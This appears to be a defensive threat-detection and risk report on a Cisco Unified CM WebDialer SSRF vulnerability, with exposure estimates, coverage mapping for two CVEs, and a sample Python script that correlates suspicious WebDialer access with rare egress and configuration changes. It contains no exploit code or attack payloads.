Cisco Unified CM / Unified CM SME WebDialer SSRF and voice-control-plane appliance compromise exposure creates organizational risk by increasing uncertainty around communications infrastructure trust, WebDialer access, backend request behavior, voice-management egress, administrative integrity, route-plan integrity, call-routing integrity, service-state reliability, appliance-side file activity, provider-managed access, contact-center continuity, executive communications, emergency coordination, and incident-response communications. Exposure rises when suspicious activity affects Cisco Unified CM / Unified CM SME environments supporting internal telephony, customer support, contact-center routing, regulated communications, emergency notification, business-continuity coordination, legal or executive communications, or operational workflows that depend on trusted voice-control-plane availability.

Estimated Economic Exposure

Estimated exposure should be treated as scenario-based rather than fixed. The most defensible enterprise estimate is tied to whether activity remains attempted or low-scope WebDialer abuse, becomes confirmed or strongly suspected Cisco Unified CM / Unified CM SME compromise, or expands into rare appliance egress, unauthorized administrative activity, route-plan manipulation, call-routing change, file or service manipulation, sensitive configuration exposure, sustained voice-service disruption, contact-center impact, customer communications interruption, legal review, regulatory assessment, cyber-insurance scrutiny, executive reporting, or board-level communications-infrastructure trust restoration.

Low Impact Scenario

Estimated exposure: $85,000 to $275,000

This scenario applies when rapid investigation confirms suspicious WebDialer activity, scanning, exploitation attempts, or candidate SSRF-shaped requests without evidence of rare Unified CM egress, unauthorized administrator activity, route-plan change, call-routing manipulation, service restart, file modification, sensitive configuration access, backup exposure, certificate or key access, voice-service instability, or appliance-side compromise. Activity may involve abnormal WebDialer access, unapproved source context, unusual request parameters, reverse-proxy alerts, WAF events, failed request patterns, vulnerability scanning, or early exploit probing, but WebDialer access logs, reverse-proxy telemetry, load-balancer logs, firewall logs, DNS logs, administrative audit records, service-state telemetry, route-plan telemetry, file-integrity telemetry, and change-control records support a failed, contained, or non-impacting event.

Response remains limited to emergency exposure review, patch validation, WebDialer restriction or disablement, approved-source validation, firewall and proxy log review, Unified CM administrative audit review, route-plan and call-routing validation, service-state review, targeted detection deployment, short-term monitoring, and executive assurance that communications control-plane integrity remains intact.

Moderate Impact Scenario

Estimated exposure: $275,000 to $950,000

This scenario applies when suspicious WebDialer activity is confirmed or strongly suspected and follow-on evidence creates uncertainty around Cisco Unified CM / Unified CM SME integrity. Follow-on evidence may include rare Unified CM egress, abnormal management-plane activity, suspicious administrative activity, service restart, file modification, route-plan change, call-routing change, backup or export activity, certificate or key access, unusual cluster communication, or degraded confidence in voice-control-plane integrity.

The organization may not be able to immediately determine whether suspicious WebDialer activity resulted in unintended backend request behavior, appliance-side access, unauthorized configuration change, route-plan manipulation, call-routing impact, service-state disruption, sensitive configuration exposure, or persistence through administrative control. Response may require incident response, forensic triage, WebDialer exposure validation, Unified CM administrative audit reconstruction, route-plan review, call-routing verification, service validation, file-integrity review, egress review, vendor escalation, change rollback, contact-center assurance, helpdesk coordination, executive reporting, and enhanced monitoring across voice-management infrastructure.

High Impact Scenario

Estimated exposure: $950,000 to $4.2 million

This scenario applies when WebDialer SSRF or adjacent Cisco voice-platform compromise becomes an enterprise-impact event involving confirmed appliance-side compromise, unauthorized administrator creation, malicious route-plan or call-routing modification, service manipulation, file-write activity, command execution, sensitive configuration exposure, certificate or key exposure, backup exposure, sustained voice-service disruption, contact-center interruption, customer-support degradation, emergency communications impact, or loss of trust in Cisco Unified CM / Unified CM SME control-plane integrity.

The organization may need to assume that voice-control-plane systems, route-plan objects, call-routing workflows, administrative access, service state, and communications continuity were affected until audit evidence proves otherwise. Response may require extended incident response, appliance rebuild or rollback, configuration restoration, call-routing reconstruction, route-plan validation, cluster health validation, certificate and key review, backup integrity validation, provider-support review, legal and regulatory review, cyber-insurance coordination, communications planning, customer-impact management, executive and board reporting, and formal validation that enterprise voice-control-plane trust can safely resume.

Annualized Risk Exposure

Estimated annualized exposure is highest for materially exposed enterprise environments with broad Cisco Unified CM / Unified CM SME dependency, WebDialer-enabled services, externally reachable or provider-managed access paths, incomplete URI or query retention, weak segmentation, immature rare-egress baselines, incomplete administrative audit telemetry, limited route-plan monitoring, insufficient service-state visibility, unclear provider-support access, or inconsistent voice-control-plane recovery procedures.

Exposure may reach the high-impact range where suspicious WebDialer activity or adjacent Cisco voice-platform exploitation results in confirmed or suspected appliance-side compromise, unauthorized administrator activity, route-plan manipulation, call-routing change, sensitive configuration exposure, certificate or key access, service disruption, contact-center impact, emergency communications risk, customer-support interruption, cyber-insurance review, legal escalation, communications response, or board-level reporting.

Operational Dependency

Operational dependency is high where Cisco Unified CM / Unified CM SME supports enterprise voice routing, click-to-call workflows, customer-support lines, contact-center operations, executive communications, emergency coordination, incident-response communications, regulated communications, provider-managed voice operations, directory-integrated calling, and business-continuity workflows. Dependency increases when affected Unified CM nodes, SME nodes, clusters, route-plan objects, call-routing configurations, administrative accounts, service-state controls, management interfaces, or voice-management segments are required to sustain customer communication, support internal operations, coordinate emergency response, maintain contact-center availability, or preserve communications during containment and recovery.

Control Trust

Control trust is reduced when the organization cannot prove that WebDialer access, approved click-to-call workflows, source legitimacy, reverse-proxy routing, load-balancer behavior, firewall policy, voice-control-plane egress, administrative audit logs, route-plan changes, call-routing changes, service-state transitions, file-integrity records, provider-support activity, backup or export activity, and emergency remediation remained reliable during the event.

Control trust is further reduced when suspicious WebDialer activity cannot be tied to a stable Cisco Unified CM scope across node, cluster, backend host, management interface, NAT egress identity, administrator, or voice-management segment. Trust is also reduced when approved provider support, vulnerability scanning, monitoring, patch validation, backup activity, certificate management, route-plan changes, service restarts, or emergency remediation cannot be distinguished from suspicious post-exploitation behavior.

Visibility Confidence

Visibility confidence is highest when WAF logs, reverse-proxy logs, load-balancer logs, firewall logs, proxy logs, DNS logs, NDR telemetry, Cisco Unified CM / Unified CM SME access logs, administrative audit logs, service-state telemetry, configuration-change telemetry, route-plan telemetry, call-routing telemetry, file-integrity telemetry, endpoint-adjacent telemetry, backup or export records, provider-support records, change-control records, asset inventory, WebDialer enablement inventory, approved-source inventories, and egress baselines can be joined reliably.

Visibility confidence is reduced where URI paths and query strings are not preserved, forwarded-source identity is unreliable, NAT or reverse-proxy mapping cannot be tied back to the same Unified CM scope, WebDialer enablement state is unknown, administrative audit logs are missing, service-state telemetry is unavailable, route-plan changes are not monitored, file-integrity telemetry is absent, rare egress baselines are immature, endpoint visibility is unavailable, provider-support activity is undocumented, or timestamp normalization is inconsistent across detection sources.

Change-Control Confidence

Change-control confidence is high when WebDialer exposure decisions, patching activity, provider support, vulnerability scanning, monitoring, certificate management, backup activity, service restarts, route-plan changes, call-routing changes, cluster maintenance, emergency remediation, administrative account changes, and detection exceptions are documented and attributable. Confidence is reduced when change-control records are incomplete, delayed, inconsistent, unavailable, or disconnected from WebDialer logs, administrative audit telemetry, route-plan records, service-state telemetry, firewall logs, proxy logs, NDR telemetry, SIEM alerts, provider-support records, and incident-response evidence.

Downstream Dependency

Downstream dependency is high when Cisco Unified CM / Unified CM SME connects to directory services, contact-center platforms, SIP trunks, emergency calling workflows, collaboration platforms, helpdesk operations, customer-support systems, provider-managed services, backup infrastructure, monitoring tools, security operations workflows, executive communications, and incident-response communications. These dependencies increase the impact of even limited voice-control-plane uncertainty when call routing, route-plan integrity, administrator activity, service state, provider access, egress behavior, or communications availability cannot be validated quickly.

Customer and Regulatory Exposure

Customer and regulatory exposure increases when suspicious Cisco Unified CM / Unified CM SME activity may affect customer-support lines, contact-center routing, emergency communications, regulated communications, healthcare coordination, financial operations, legal communications, executive communications, incident-response coordination, or availability of communications services. Exposure also increases when incomplete telemetry prevents timely confirmation of whether route-plan changes, call-routing changes, service restarts, administrative activity, configuration access, certificate or key access, backup or export activity, rare egress, or provider-managed access was legitimate, malicious, or caused by approved operational activity.

Residual Economic Risk

Residual economic risk remains after containment if the organization cannot prove that affected systems were patched, WebDialer exposure was restricted, approved access paths were validated, suspicious WebDialer activity was scoped, rare egress was reviewed, administrative access was audited, route-plan integrity was validated, call-routing behavior was confirmed, service state was restored, file-integrity findings were reviewed, sensitive configuration access was assessed, certificates and keys were validated, backups were checked, provider-support activity was reconciled, and voice-control-plane trust was restored.

Residual risk is highest where WebDialer telemetry, reverse-proxy logs, URI and query retention, administrative audit evidence, service-state telemetry, route-plan telemetry, call-routing telemetry, file-integrity evidence, rare-egress baselines, provider-support records, endpoint-adjacent telemetry, change-control evidence, or stable Cisco Unified CM scope mapping are incomplete.

Behavioral Coverage Assessment

This report’s behavioral detection model directly covers Cisco Unified CM / Unified CM SME WebDialer suspicious activity and follow-on voice-control-plane compromise behavior that aligns with WebDialer access abuse, SSRF-shaped request behavior, backend request abuse through trusted appliance context, rare Unified CM egress, suspicious administrative activity, service restart, service manipulation, file creation or modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, and suspected appliance-side compromise.

The report is behavior-led and should not be interpreted as limited to one exploit string, one source IP, one actor name, one proof-of-concept, one public advisory, one payload, one URL pattern, one product build, or one static IOC. The primary detection value is the ability to connect suspicious voice-management web activity to downstream voice-control-plane behavior, not merely to identify the presence of a numbered vulnerability.

CVE / KEV Coverage Assessment

This report directly maps to CVE-2026-20230 because the S25 detection model explicitly covers Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity and follow-on voice-control-plane behavior. Direct CVE mapping is appropriate where suspicious WebDialer activity, WebDialer enablement, affected Unified CM / Unified CM SME scope, SSRF-shaped request indicators, rare egress, administrative change, service activity, file activity, route-plan change, call-routing change, or voice-service instability are observable.

Coverage with adaptation applies to Cisco Unified Communications and adjacent Cisco voice-platform compromise vulnerabilities where the observable behavior overlaps this report’s voice-control-plane compromise model but the initial exploitation path is not WebDialer SSRF. CVE-2026-20045 is covered with adaptation because it affects Cisco Unified Communications products and can allow unauthenticated remote command execution on the underlying operating system of an affected device. The downstream behaviors may overlap this report’s detection model, including command execution, file activity, service manipulation, rare egress, administrative change, route-plan change, call-routing impact, or voice-service instability, but the upstream trigger requires amended logic because the exploit path is not the WebDialer SSRF path modeled as the primary entry condition in this TTD.

KEV status should remain a remediation and urgency signal, not a detection coverage proof. CVE-2026-20045 is represented in this coverage set with adaptation because it is a related Cisco Unified Communications KEV item whose downstream behavior may overlap this report’s voice-control-plane compromise model. This report should not represent a CVE as covered solely because it appears in KEV, public reporting, vendor advisories, exploit reporting, proof-of-concept reporting, or vulnerability roundups. A CVE should only be added when the affected component, exploitation mechanism, telemetry requirements, privilege model, affected workflow, impacted voice-platform function, and relationship to the report’s WebDialer-to-control-plane or voice-platform compromise model are validated.

Named Malware / Tooling / PhaaS Coverage

No named malware, tooling family, PhaaS platform, or named exploit toolkit is directly counted in this version.

Public exploit activity, proof-of-concept code, scanner behavior, commodity probing, or unnamed exploitation infrastructure may overlap this report where observable behavior aligns with suspicious WebDialer access, SSRF-shaped request behavior, rare egress, file activity, service manipulation, administrative change, route-plan change, call-routing change, or voice-service instability. Those items should remain activity context unless a named tool, exploit kit, malware family, webshell, script, payload, or operational framework is source-validated and behaviorally mapped to the S21 through S25 detection model.

Named APT / Actor / Campaign Activity Coverage

No named APT, actor, intrusion set, or campaign is directly counted in this version.

Public exploitation of Cisco Unified CM / Unified CM SME WebDialer SSRF may indicate active threat interest in the affected behavior class, but actor names, campaign names, infrastructure labels, victimology, exploit-source labels, and reporting names should remain enrichment only unless the activity produces observable behavior aligned with this report’s detection model. Detection coverage should remain based on WebDialer activity, SSRF-shaped request behavior, voice-control-plane follow-on signals, rare egress, administrative change, service activity, file activity, route-plan change, call-routing change, and voice-service instability.

Detection Engineering Coverage Interpretation

The S25 detection content provides direct behavioral coverage for Cisco Unified CM / Unified CM SME WebDialer SSRF and voice-control-plane compromise behavior where observable activity falls directly inside the report’s detection model: suspicious WebDialer access, abnormal source or workflow context, WebDialer enablement, SSRF-shaped request indicators, backend-fetch behavior, response anomalies, rare Unified CM egress, suspicious administrative activity, service-state change, file activity, route-plan change, call-routing change, abnormal management login, unusual cluster communication, and voice-service instability.

The S25 detection content provides coverage with adaptation for adjacent Cisco Unified Communications compromise paths when the downstream behavior aligns with the report’s voice-control-plane compromise model but the upstream trigger differs from WebDialer SSRF. Adaptation may require changing the initial trigger from WebDialer-specific request behavior to another affected web-management, appliance, API, or HTTP request path while preserving follow-on correlation to rare egress, command execution, file activity, service manipulation, administrator change, route-plan change, call-routing change, or voice-service instability.
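One way to implement the WebDialer-to-control-plane join described above, as an added example that is not part of this report's S21 through S25 content or any Cisco tooling: WebDialer access from a non-approved source is the trigger, follow-on rare egress and control-plane audit changes are joined on the same Unified CM node inside a fixed window, and trigger events whose node scope the reverse proxy could not resolve are set aside rather than silently dropped. Log fields, hostnames, the WebDialer request path, the approved-source inventory and the per-node egress baseline are all constructed assumptions.

```python
# Added example (not CyberDax's or Cisco's code): joins suspicious WebDialer access
# with follow-on voice-control-plane events on the same Unified CM node. All log
# fields, hostnames, paths and the approved/baseline lists are constructed
# assumptions, not Cisco log formats or real inventory data.
from datetime import datetime, timedelta
from typing import Callable

WINDOW = timedelta(minutes=30)      # follow-on correlation window (assumed value)
APPROVED_SOURCES = {"10.20.30.41"}  # approved click-to-call source inventory (constructed)
EGRESS_BASELINE = {"cucm-pub01": {"10.20.30.5", "10.20.30.6"}}  # per-node baseline (constructed)
CONTROL_PLANE_ACTIONS = {"route_pattern_update", "service_restart", "admin_user_add"}


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample telemetry. "node" is the Unified CM scope the reverse proxy
# resolved for the request; an empty node means the mapping could not be tied back.
WEB_LOG = [
    {"ts": "2026-06-24T09:00:05", "node": "cucm-pub01", "src": "10.20.30.41", "path": "/webdialer/Webdialer"},
    {"ts": "2026-06-24T09:02:10", "node": "cucm-pub01", "src": "198.51.100.7", "path": "/webdialer/Webdialer"},
    {"ts": "2026-06-24T09:03:00", "node": "",           "src": "198.51.100.9", "path": "/webdialer/Webdialer"},
    {"ts": "2026-06-24T11:30:00", "node": "cucm-sub02", "src": "198.51.100.7", "path": "/webdialer/Webdialer"},
]
EGRESS_LOG = [
    {"ts": "2026-06-24T09:05:30", "node": "cucm-pub01", "dst": "10.20.30.5"},    # in baseline
    {"ts": "2026-06-24T09:06:12", "node": "cucm-pub01", "dst": "203.0.113.55"},  # rare egress
]
AUDIT_LOG = [
    {"ts": "2026-06-24T09:15:44", "node": "cucm-pub01", "admin": "ccmadmin", "action": "route_pattern_update"},
    {"ts": "2026-06-24T14:00:00", "node": "cucm-sub02", "admin": "ccmadmin", "action": "service_restart"},
]


def webdialer_trigger(ev: dict) -> bool:
    """Direct-coverage trigger: a WebDialer request from a source outside the approved inventory."""
    return ev["path"].startswith("/webdialer/") and ev["src"] not in APPROVED_SOURCES


def correlate(web_log, egress_log, audit_log, trigger: Callable[[dict], bool] = webdialer_trigger):
    """Return (chains, unscoped). A chain links one trigger event to rare egress and
    control-plane changes on the same node inside WINDOW; unscoped holds trigger
    events with no resolvable Unified CM scope, which need proxy/NAT mapping review."""
    chains, unscoped = [], []
    for ev in web_log:
        if not trigger(ev):
            continue
        if not ev["node"]:
            unscoped.append(ev)
            continue
        t0, t1 = _ts(ev["ts"]), _ts(ev["ts"]) + WINDOW
        baseline = EGRESS_BASELINE.get(ev["node"], set())
        rare = [e for e in egress_log if e["node"] == ev["node"]
                and t0 <= _ts(e["ts"]) <= t1 and e["dst"] not in baseline]
        changes = [a for a in audit_log if a["node"] == ev["node"]
                   and t0 <= _ts(a["ts"]) <= t1 and a["action"] in CONTROL_PLANE_ACTIONS]
        severity = "high" if rare and changes else "medium" if rare or changes else "low"
        chains.append({"node": ev["node"], "src": ev["src"], "trigger_ts": ev["ts"],
                       "rare_egress": rare, "control_plane_changes": changes, "severity": severity})
    return chains, unscoped


if __name__ == "__main__":
    found, unscoped = correlate(WEB_LOG, EGRESS_LOG, AUDIT_LOG)
    for c in found:
        print(c["severity"], c["node"], c["src"], len(c["rare_egress"]), len(c["control_plane_changes"]))
    print("unscoped trigger events needing proxy/NAT mapping review:", len(unscoped))
```

For coverage with adaptation, pass a different `trigger` predicate for another web-management or API request path and leave the follow-on join unchanged.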

The S25 detection content provides actor, campaign, tooling, and exploit-activity coverage only as behavior-led coverage. Actor names, reporting names, proof-of-concept names, infrastructure names, exploit-kit names, and public activity labels should not be used as detection inputs unless they are locally approved enrichment fields supporting triage. Detection coverage remains based on observable Cisco Unified CM / Unified CM SME and voice-control-plane behavior.

Direct Coverage

Direct behavioral coverage applies to Cisco Unified CM / Unified CM SME WebDialer SSRF and voice-control-plane compromise behavior that can be detected by the report’s S21 through S25 logic without requiring a separate detection model.

CVE-2026-20230

Directly covered.

Cisco Unified CM / Unified CM SME WebDialer suspicious activity followed by rare egress or voice-control-plane change

Directly covered.

Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped request behavior

Directly covered.

Cisco Unified CM / Unified CM SME rare egress after suspicious WebDialer activity

Directly covered.

Cisco Unified CM / Unified CM SME administrative, service-state, route-plan, call-routing, file, or voice-service instability behavior after suspicious WebDialer activity

Directly covered.

Coverage With Adaptation

Coverage with adaptation applies to related Cisco Unified Communications, voice-platform, web-management, appliance-control-plane, or HTTP request-handling vulnerabilities that may share parts of the report’s voice-control-plane compromise model but require local tuning for affected component, initial exploit path, telemetry source, affected product, request path, privilege requirement, endpoint visibility, administrative context, file or service behavior, route-plan behavior, call-routing behavior, or egress model.

CVE-2026-20045

Covered with adaptation.

Adjacent Cisco Unified Communications product compromise paths involving Unified CM, Unified CM SME, Unified CM IM & Presence Service, Unity Connection, or Webex Calling Dedicated Instance where observable behavior includes command execution, file activity, service manipulation, administrative change, rare egress, route-plan change, call-routing impact, or voice-service instability

Covered with adaptation after source validation and behavior-to-telemetry alignment.

Future Cisco Unified CM / Unified CM SME WebDialer, web-management, API, voice-management, or appliance-control-plane CVEs where observable behavior aligns to the report’s WebDialer-to-control-plane or voice-platform compromise model

Covered with adaptation after source validation and behavior-to-telemetry alignment.

Future exploit activity, proof-of-concept activity, malware, webshell, tooling, or actor campaigns targeting Cisco Unified Communications infrastructure where observable behavior aligns to suspicious voice-management web access, rare egress, command execution, file activity, administrative change, service manipulation, route-plan change, call-routing change, or voice-service instability

Covered with adaptation after source validation and behavior-to-telemetry alignment.

Non-Coverage Conditions

Non-coverage applies where related activity does not produce observable suspicious WebDialer activity, voice-management web activity, SSRF-shaped request behavior, backend-fetch behavior, rare Unified CM egress, command execution, administrative change, service-state change, file activity, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or appliance-side compromise evidence.

Activity limited to unrelated Cisco products, unrelated network appliances, generic internet scanning, unrelated web exploitation, endpoint-only malware, unrelated SaaS platforms, cloud-only anomalies, identity-only anomalies without voice-platform follow-on behavior, network-only anomalies without Cisco Unified CM scope, isolated public reporting, actor attribution, infrastructure indicators, static IOCs, or unrelated CVE exploitation should not be represented as covered by this report.

A CVE should not be counted when it depends on an unrelated exploitation mechanism, lacks sufficient technical detail, affects an unrelated component, produces no aligned Cisco Unified CM / Unified CM SME or voice-control-plane telemetry, cannot be correlated through the report’s WebDialer-to-control-plane or voice-platform compromise model, or would require detection logic outside the S21 through S25 strategy.

A malware, tooling, PhaaS, actor, or campaign name should not be counted when coverage depends only on branding, infrastructure indicators, static IOCs, exploit naming, actor attribution, public reporting labels, or vendor naming rather than observable behavior aligned with the report’s detection model.

Current Coverage Count

Directly covered CVEs

1

CVEs covered with adaptation

1

Known Exploited Vulnerabilities represented in this coverage set

1

Known Exploited Vulnerability represented with adaptation

CVE-2026-20045

Directly covered malware / tooling / PhaaS / tradecraft names or named tooling patterns

0

Malware / tooling / PhaaS / tradecraft names covered with adaptation

0 currently counted in this version. Future named exploit tooling, webshells, scripts, malware, proof-of-concept frameworks, scanning infrastructure, or appliance-compromise tooling may be added only after source validation and behavior-to-telemetry alignment.

Directly covered APT / actor / campaign activity names or named activity patterns

0

APT / actor / campaign activity names covered with adaptation

0 currently counted in this version. Future actor or campaign activity may be added only when the observable behavior aligns with the report’s Cisco Unified CM / Unified CM SME WebDialer, voice-control-plane, rare-egress, administrative-change, service-manipulation, route-plan, call-routing, or voice-service instability model.

Directly covered behavioral tradecraft classes

1 core behavior class, Cisco Unified CM / Unified CM SME WebDialer SSRF and voice-control-plane appliance compromise behavior.

Behavioral tradecraft classes covered with adaptation

1 adjacent behavior class, Cisco Unified Communications appliance compromise involving unauthenticated remote command execution or adjacent voice-platform exploitation with overlapping post-exploitation telemetry.

Total explicitly counted coverage items

3

Count Composition

1 directly covered CVE.

1 CVE covered with adaptation.

1 directly covered behavioral tradecraft class.

Coverage Qualification

This count is a living analytical note, not a universal Cisco Unified Communications, Cisco Unified CM, Cisco Unified CM SME, Cisco voice-platform, Cisco appliance, VoIP infrastructure, command-execution, SSRF, web-management, appliance-compromise, malware, tooling, actor, or campaign coverage claim. A related CVE, malware family, exploit kit, webshell, proof-of-concept, actor cluster, campaign report, advisory, or public exploitation report should only be added when it shares enough observable behavior with the report’s detection model to support credible detection or detection-readiness coverage.

Direct coverage should remain limited to the report’s core Cisco Unified CM / Unified CM SME WebDialer-to-control-plane behavior, including suspicious WebDialer access, WebDialer enablement, SSRF-shaped request behavior, backend-fetch behavior, abnormal response behavior, rare egress, suspicious administrative activity, service-state change, file activity, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, and suspected appliance-side compromise.

Covered-with-adaptation items should remain counted only when the activity can be correlated through WAF logs, reverse-proxy logs, load-balancer logs, Cisco Unified CM access logs, administrative audit logs, service-state telemetry, route-plan telemetry, call-routing telemetry, file-integrity telemetry, firewall logs, proxy logs, DNS logs, NDR telemetry, endpoint-adjacent telemetry, provider-support records, change-control evidence, approved workflow context, and stable Cisco Unified CM scope enrichment.

KEV status should be treated as an urgency and remediation-prioritization signal, not as the basis for coverage by itself. Malware, tooling, proof-of-concept, actor, and campaign names should be treated as coverage context only when their behavior aligns to the report’s S21 through S25 detection strategy.

A related CVE, proof-of-concept, malware family, webshell, exploit kit, actor cluster, or campaign report should not be counted when it depends on unrelated exploitation mechanics, lacks aligned telemetry, affects unrelated products or components, produces no Cisco Unified CM / Unified CM SME, WebDialer, rare-egress, administrative-change, service-state, route-plan, call-routing, file-activity, command-execution, or voice-service instability behavior, or requires a separate detection model.

Executive Exposure Statement

The organization’s economic exposure is highest when Cisco Unified CM / Unified CM SME compromise creates uncertainty around whether enterprise voice routing, WebDialer workflows, administrative control, route-plan integrity, call-routing behavior, service state, provider-managed access, and communications continuity remain trustworthy. The strategic risk is not only one WebDialer request, one CVE, one exploit string, one proof-of-concept, one source IP, one scanner, one advisory, or one public exploitation report; it is the possibility that attackers can convert trusted voice-management infrastructure into a control-plane compromise path that disrupts communications, undermines call-routing integrity, increases legal and regulatory uncertainty, and forces executive-level validation of communications-infrastructure trust.

S40 — References

Vendor / Platform Documentation

Cisco Feature Configuration Guide for Cisco Unified Communications Manager - WebDialer - hxxps://www[.]cisco[.]com/c/en/us/td/docs/voice_ip_comm/cucm/admin/cucm_b_feature-configuration-guide-for-15/cucm_mp_w3db9717_00_webdialer-12-0[.]html

Cisco DevNet - WebDialer - hxxps://developer[.]cisco[.]com/site/webdialer/webdialer/

Cisco Security Advisory - Cisco Unified Communications Manager Server-Side Request Forgery Vulnerability - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW

Cisco Security Advisory - Cisco Unified Communications Products Remote Code Execution Vulnerability - hxxps://sec[.]cloudapps[.]cisco[.]com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b

CVE / KEV and Vulnerability Reference

CISA Known Exploited Vulnerabilities Catalog - hxxps://www[.]cisa[.]gov/known-exploited-vulnerabilities-catalog

National Vulnerability Database - CVE-2026-20045 - hxxps://nvd[.]nist[.]gov/vuln/detail/CVE-2026-20045

Threat Technique Framework

MITRE ATT&CK Enterprise Matrix / Techniques Catalog - hxxps://attack[.]mitre[.]org/

Public Exploitation Reporting

BleepingComputer - Cisco Unified CM flaw CVE-2026-20230 now exploited in attacks - hxxps://www[.]bleepingcomputer[.]com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/

The Hacker News - Cisco Unified CM Flaw Exploited After PoC Reveals File-Write Path to Root - hxxps://thehackernews[.]com/2026/06/cisco-unified-cm-flaw-exploited-after[.]html
